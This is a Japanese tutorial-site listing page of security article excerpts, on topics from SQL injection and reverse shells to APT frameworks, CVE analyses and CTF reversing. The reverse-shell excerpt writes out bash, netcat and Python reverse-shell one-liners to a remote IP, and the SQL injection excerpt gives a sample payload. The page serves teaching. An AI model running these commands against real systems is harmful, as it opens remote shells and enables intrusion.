ページ 31-安全性プログラミングチュートリアル: 安全性オンラインで学ぶ-php.cn

現在位置：ホームページ > 技術記事 > 運用・保守 > 安全性

方向：: 全てウェブ3.0 バックエンド開発ウェブフロントエンドデータベース運用・保守開発ツール PHPフレームワークよくある問題他の技術 CMS チュートリアル Java システムチュートリアルコンピューターのチュートリアルハードウェアチュートリアルモバイルチュートリアルソフトウェアチュートリアルモバイルゲームのチュートリアル

分類する：: Mac OS Linuxの運用と保守 Apache Nginx CentOS Docker LVS vagrant debian zabbix kubernetes ssh fabric

さいねつ

最新

SQLインジェクションにはどのような種類がありますか?

はじめに SQL インジェクション攻撃手法は、データベースから返されたコンテンツを処理するアプリケーションに基づいて、明示的インジェクション、エラーインジェクション、ブラインドインジェクションに分類できます。明示的インジェクション攻撃者は、現在のインターフェイスのコンテンツから必要なコンテンツを直接取得できます。エラー挿入データベースクエリによって返された結果はページには表示されませんが、アプリケーションはデータベースエラー情報をページに出力するため、攻撃者はデータベースエラーステートメントを作成し、エラー情報から目的のコンテンツを取得できます。ブラインドインジェクションデータベースクエリの結果は、直感的なページからは取得できず、攻撃者はデータベースロジックを使用するか、データベースライブラリの実行を遅延させることで、目的のコンテンツを取得します。 MySQL 手動インジェクション複合インジェクション?id=1'orderby4--

安全性 2372 2023-05-18 22:05:12
リバウンドシェルとは何ですか？

1.bash リバウンド bash-i>&/dev/tcp/ip_address/port0>&12.nc リバウンド nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

安全性 2472 2023-05-18 22:01:04
NSAの新しいAPTフレームワークDarkPulsarの使い方

序文 2017 年 3 月、ShadowBrokers は、DanderSpritz と FuzzBunch という 2 つのフレームワークを含む機密文書を公開し、世界に衝撃を与えました。 DanderSpritz は完全にプラグインで構成されており、情報を収集し、脆弱性を悪用し、乗っ取られたデバイスを操作するために使用されます。これは Java で書かれており、ボットネット管理パネルに似たグラフィカルインターフェイスと、Metasploit ツールに似たコントロールパネルを提供します。また、FuzzBunch によって制御されていないデバイス用のバックドアとプラグインも組み込まれています。 DanderSprit インターフェイスの概要 Fuzzbunch は、さまざまなタイプのプラグインを含む、さまざまなユーティリティが相互作用して連携するためのフレームワークを提供します。

安全性 1510 2023-05-18 20:14:58
Ghostscript SAFER サンドボックスバイパスの脆弱性を分析する方法

はじめに Ghostscript は、Adobe PostScript 言語のインタープリタソフトウェアです。 PostScript 言語で描画でき、PS と PDF 間の変換をサポートします。現在、Ghostscript はほとんどの Linux ディストリビューションにデフォルトでインストールされており、Unix、MacOS、Windows、その他のプラットフォームに移植されており、ImagineMagic、PythonPIL、さまざまな PDF リーダーなどのプログラムでも使用されています。脆弱性の説明 8 月 21 日、Google のセキュリティ研究者である Tavis Ormandy 氏は、複数の GhostScript の脆弱性を公開しました。

安全性 1998 2023-05-18 19:10:39
DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

安全性 1597 2023-05-18 17:13:20
制限を回避して Google の内部管理システムにアクセスした例の分析

ある日、Google の脆弱性を調べていたところ、公開されている脆弱性から Google 独自のサービスの IP アドレスをいくつか発見しましたが、最初はこれらの IP アドレスで何ができるのか全く分かりませんでした。まずこれらの IP アドレスを確認したところ、Google の内部 IP の一部が含まれていることがさらにわかりました。最近、友人の KLSREERAM が Google の内部 IP に関連する脆弱性を報告し、別の友人の Vishnu が Google のサブドメインを使用してコントロールパネルにアクセスする脆弱性を報告したことを突然思い出しました。現在、両方の脆弱性は Google によって修正されており、これら 2 つの脆弱性に関連する内部 IP アドレスにはインターネットからアクセスできません。しかし今、目の前にいくつかの内部 Google IP アドレスがあるので、それができるかどうかを確認する方法を見つけなければなりません。

安全性 1223 2023-05-18 15:19:49
Disk Pulse Enterprise Windowアプリケーションの脆弱性解析の実施方法

1. 脆弱性の概要 DiskPulseEnterprise はディスクの変更を監視するソフトウェアであり、管理ポート 9120 または Web 管理ウィンドウ 80 を介してソフトウェアに接続して管理し、ディスクの変更を監視できます。 DiskPulse Enterprise にはダイナミックリンクライブラリ libspp.dll があり、これには HTTP 操作を担当するいくつかの関数が含まれています。この問題はこのダイナミックリンクライブラリで発生します。ポストデータを処理する際、ポストデータの長さは厳密に制御されていないため、取得したデータを実行すると、無効なメモリにデータをコピーしてバッファオーバーフローを引き起こし、SEHの異常動作処理を引き起こし、最終的にはEIPを制御して任意のコードを実行させます。ソフトウェアのダウンロードリンク:h

安全性 1234 2023-05-18 15:04:07
APP クラッシュの主な原因は何ですか?

1. どのようなシナリオがクラッシュ問題を引き起こす可能性がありますか? 最近、私はどのような問題がクラッシュを引き起こす可能性があるのか、つまり異常な思考を持っているのかについて考えています。「ちょうど 2 日前。『ポリス』で、主人公のジョン・ノーランが逃走者の車をパトカーで止めるのに失敗し、逃走者が逃走するシーンがあります。このシーンとテストとの関係は何ですか？」まず第一に、普通の人は道路を運転するときに他人との衝突を避けます。これは機能をテストする主要なプロセスのようなもので、ランダムな入力は行いませんが、警察官は違います。彼は捕まえるために必要なことは何でもします。すべての方法、これはテストプロセス中に機能を使いにくくするためにどのように操作するかを考える異常な思考のようなものです。ガイド1. 異常動作各種異常動作

安全性 2595 2023-05-18 13:55:06
MySQL データベースの一般的なテクニックは何ですか?

1. サーバーの種類はどのように選択すればよいですか? MySQL サーバー設定ウィンドウの各パラメーターの意味は次のとおりです。 [ServerConfigurationType] このオプションは、サーバーのタイプを設定するために使用されます。このオプションの右側にある下ボタンをクリックすると、3 つのオプションが表示されます。 3 つのオプションの具体的な意味は次のとおりです。開発マシン: このオプションは、典型的な個人用デスクトップワークステーションを表します。マシン上で複数のデスクトップアプリケーションが実行されていると仮定します。最小限のシステムリソースを使用するように MySQL サーバーを構成します。 ServerMachine (サーバー): このオプションはサーバーを表します。MySQL サーバーは、FTP、ema などの他のアプリケーションと一緒に実行できます。

安全性 1114 2023-05-18 13:29:00
SolarWinds サプライチェーン APT 攻撃事件のセキュリティリスク分析例

背景米国のトップセキュリティ企業FireEye（中国名：火炎）は12月13日、世界規模の侵入活動を発見したとの報告書を発表し、この組織をUNC2452と命名した。 APT組織はSolarWinds社に侵入し、SolarWindsOrion商用ソフトウェアアップデートパッケージに悪意のあるコードを埋め込んで配布しており、FireEyeはこれをSUNBURSTマルウェアと呼んでいた。バックドアには、ファイルの転送、ファイルの実行、システムの分析、マシンの再起動、システムサービスの無効化などの機能が含まれており、横方向の移動やデータの盗難が可能になります。 SolarWindsOrionPlatform は、強力でスケーラブルなインフラストラクチャ監視および管理プラットフォームです。

安全性 1250 2023-05-18 12:52:27
vBulletin 5.x のリモートコード実行の脆弱性の分析例

vBulletin コンポーネントの紹介 vBulletin は、フォーラムおよびコミュニティ公開ソフトウェアの世界的リーダーです。そのセキュリティ、強力な管理機能とスピード、および 40,000 を超えるオンラインコミュニティにサービスを提供する能力は、顧客から高く評価されています。多くの大規模フォーラムは、コミュニティとして vBulletin を選択しています。 vBulletin の公式 Web サイトに表示されている顧客リストから、有名なゲーム制作会社 EA、有名なゲームプラットフォーム Steam、日本の大手多国籍企業ソニー、米国 NASA がすべて顧客であることがわかります。中国には、Hummingbird.com、51 Group Buying、Ocean Tribe、および数万人が vBull を使用しているその他のオンラインフォーラムなど、多くの大規模顧客もあります。

安全性 1467 2023-05-18 11:46:45
積極的な攻撃下で Google が Chrome のゼロデイ脆弱性を修正した例の分析

Googleは25日、悪用が活発に行われているゼロデイ脆弱性を含む3件のセキュリティ脆弱性を修正するChromeアップデートをリリースした。これらの攻撃の詳細や、Chrome ユーザーに対して脆弱性がどのように悪用されたかは公開されていません。この攻撃は、Google の脅威分析チームのメンバーである Clement Lecigne 氏によって 2 月 18 日に発見されました。 Google 脅威分析グループは、脅威アクターのグループを調査および追跡する Google の部門です。 Chrome バージョン 80.0.3987.122 では、ゼロデイ脆弱性が修正されています。このアップデートは Windows、Mac、Linux ユーザーが利用できますが、ChromeOS、iOS、Android ユーザーも利用できます。

安全性 997 2023-05-18 11:25:12
署名アルゴリズムに基づくシンプルで安全な API 認証メカニズムとは何ですか?

私が広告システムに取り組んでいたとき、接続したほとんどのプラットフォームの広告システムはインターフェイスを承認するためにトークンを使用していることがわかりましたが、このトークンは変更されずに広告主によって提供されたものであり、これはストリーキングインターフェイスであると言えます。ただし、この種のインターフェイスには高度なセキュリティ要件はなく、悪意のある呼び出しを防止し、チャネルの ID を確認することしかできません。昨年、著者は、内部サービスのオープンインターフェイスとサードパーティシステムコールの統合承認管理を提供する API 統合承認プラットフォームについて書きました。管理インターフェイスの承認を容易にすること以外に、他の目的はありませんが、導入にはコストがかかります。これはおそらく私がこれまでに行った中で最も無意味なプロジェクトです。今回紹介した API 認証機構も、より広く使われている API インターフェース認証機構である可能性があり、筆者は以前 WeChat の決済機能を行っていたことを思い出しました。

安全性 1596 2023-05-18 10:49:52
idaPro がアプリ復号化 lua スクリプトを分析する方法

前の idaPro デバッグまたはフックを通じて、xxtea 復号化キーを取得できます。署名の場合は、元のファイルを直接開くことができます。署名値: byds を確認できます。したがって、xxtea 復号化ツール (GitHub のソースコードからコンパイル可能) を使用して復号化を試みることができます。 xxtea による復号後の lua スクリプトはまだプレーンテキストではありません。以前、cocos2d フレームワークのソースコードとマスター APK のデコード結果に基づいて xxtea 暗号化が使用されていると判断し、アプリの Lua スクリプトにも署名値があり、それが xxtea 暗号化方式であることを確認しましたが、

安全性 1960 2023-05-18 08:34:19
IPアドレスの解析と適用方法

1. IP アドレス 1. IPV4 は 32 ビットの 2 進数で構成されます 2. IP アドレスは 2 つの部分で構成されます: ネットワークビット + ホストビット 3. IP アドレスの分類: カテゴリ範囲ネットワークビットとホストビット A1-126 ネットワーク + メイン+ メイン + メイン B128-191 ネットワーク + ネットワーク + メイン + メイン C192-223 ネットワーク + ネットワーク + ネットワーク + メイン D224-239 マルチキャストアドレス E240-254 科学研究 2. プライベートネットワークアドレス A10.0.0.0~10.255.255.255B172、 16.0 .0～172.31.255.255C192.168.0.0～192.168.255.255 3. サブネットマスクサブネットマスクは、IP アドレスのネットワークビットとホストビットを区別するために使用され、ネットワークビットは連続した 1 で表されます。

安全性 2166 2023-05-17 22:55:04

...

PIネットワーク（PI）価格が成功したにもかかわらず2025イベントが成功したにもかかわらず

BlockDagは2億ドルを調達してベータテストネットを発売し、イーサリアムは2,000ドルに近づき、テザーはメディアに拡大します

156 2025-04-03
Ruvi AI（Ruvi）Token Presaleは爆発的な打ち上げ後20倍かもしれません

122 2025-04-03
TrueUSDとJustin Sunの介入に襲われた予備危機に続いて、First Digital Trustは破産の主張を否定しました。

100 2025-04-03
携帯電話のマザーボードの修理にはいくらかかりますか?

298 2024-01-27
ラップトップ CPU ラダーチャート 2024

492 2024-02-22
2024 年の最新ラップトップグラフィックスカードラダーチャート

738 2024-02-22
ノートパソコンのマザーボードの修理にはいくらかかりますか?

162 2024-01-20
許可が拒否されました

155 2024-05-07
MSIマザーボードにBIOSを入力するにはどうすればよいですか?

702 2024-02-01

コース分類

ツールの推奨事項

jQuery エンタープライズメッセージフォームの連絡先コード

jQuery エンタープライズメッセージフォーム連絡先コードは、シンプルで実用的なエンタープライズメッセージフォームおよび連絡先紹介ページコードです。

フォームボタン

2024-02-29

HTML5 MP3 オルゴール再生効果

HTML5 MP3 オルゴール再生特殊効果は、HTML5 + css3 に基づく MP3 音楽プレーヤーで、かわいいオルゴールの絵文字を作成し、スイッチボタンをクリックします。

プレイヤーの特殊効果

2024-02-29

HTML5 クールなパーティクルアニメーションナビゲーションメニューの特殊効果

HTML5 クールなパーティクルアニメーションのナビゲーションメニュー特殊効果は、ナビゲーションメニューにマウスを置くと色が変化する特殊効果です。

メニューナビゲーション

2024-02-29

jQuery ビジュアルフォームのドラッグアンドドロップ編集コード

jQuery ビジュアルフォームのドラッグアンドドロップ編集コードは、jQuery およびブートストラップフレームワークに基づいたビジュアルフォームです。

フォームボタン

2024-02-29

有機果物と野菜のサプライヤー Web テンプレート Bootstrap5

有機果物と野菜のサプライヤー Web テンプレート-Bootstrap5

ブートストラップテンプレート

2023-02-03

Bootstrap3 多機能データ情報バックグラウンド管理レスポンシブ Web ページテンプレート-Novus

バックエンドテンプレート

2023-02-02

不動産リソースサービスプラットフォーム Web ページテンプレート Bootstrap5

ブートストラップテンプレート

2023-02-02

シンプルな履歴書情報 Web テンプレート Bootstrap4

ブートストラップテンプレート

2023-02-02

かわいい夏の要素のベクター素材 (EPS+PNG)

これは、太陽、日よけ帽子、ココナッツの木、ビキニ、飛行機、スイカ、アイスクリーム、アイスクリーム、冷たい飲み物、浮き輪、ビーチサンダル、パイナップル、巻貝、貝殻、ヒトデ、カニを含む、かわいい夏の要素のベクター素材です。、レモン、日焼け止め、サングラスなど、素材は JPG プレビューを含む EPS および PNG 形式で提供されています。

PNG素材

2024-05-09

4 つの赤い 2023 卒業バッジベクター素材 (AI+EPS+PNG)

これは、2023 年卒業バッジの赤いベクター素材で、合計 4 つがあり、JPG プレビューを含む AI、EPS、PNG 形式で利用できます。

PNG素材

2024-02-29

歌う鳥と花がいっぱいのカートデザイン春のバナーベクター素材（AI+EPS）

これは、さえずる鳥と花でいっぱいのカートをデザインした春のバナーベクター素材で、JPG プレビューを含む AI および EPS 形式で利用できます。

バナー画像

2024-02-29

金色の卒業帽ベクター素材（EPS+PNG）

これは、JPG プレビューを含む EPS および PNG 形式で利用できる、金色の卒業帽のベクター素材です。

PNG素材

2024-02-27

室内装飾クリーニングおよび修理サービス会社のウェブサイトのテンプレート

家の装飾のクリーニングとメンテナンスサービス会社の Web サイトテンプレートは、家の装飾、クリーニング、メンテナンス、その他のサービス組織を提供するプロモーション Web サイトに適した Web サイトテンプレートのダウンロードです。ヒント: このテンプレートは Google フォントライブラリを呼び出すため、ページが開くのが遅くなる場合があります。

フロントエンドテンプレート

2024-05-09

フレッシュカラーの個人履歴書ガイドページテンプレート

フレッシュカラーマッチング個人求人応募履歴書ガイドページテンプレートは、フレッシュカラーマッチングスタイルに適した個人求人検索履歴書仕事表示ガイドページWebテンプレートのダウンロードです。ヒント: このテンプレートは Google フォントライブラリを呼び出すため、ページが開くのが遅くなる場合があります。

フロントエンドテンプレート

2024-02-29

デザイナーのクリエイティブな仕事の履歴書 Web テンプレート

デザイナークリエイティブジョブ履歴書 Web テンプレートは、さまざまなデザイナーのポジションに適した個人の職務履歴書表示用のダウンロード可能な Web テンプレートです。ヒント: このテンプレートは Google フォントライブラリを呼び出すため、ページが開くのが遅くなる場合があります。

フロントエンドテンプレート

2024-02-28

現代のエンジニアリング建設会社のウェブサイトのテンプレート

最新のエンジニアリングおよび建設会社の Web サイトテンプレートは、エンジニアリングおよび建設サービス業界の宣伝に適したダウンロード可能な Web サイトテンプレートです。ヒント: このテンプレートは Google フォントライブラリを呼び出すため、ページが開くのが遅くなる場合があります。

フロントエンドテンプレート

2024-02-28

おすすめ記事

コース分類

ツールの推奨事項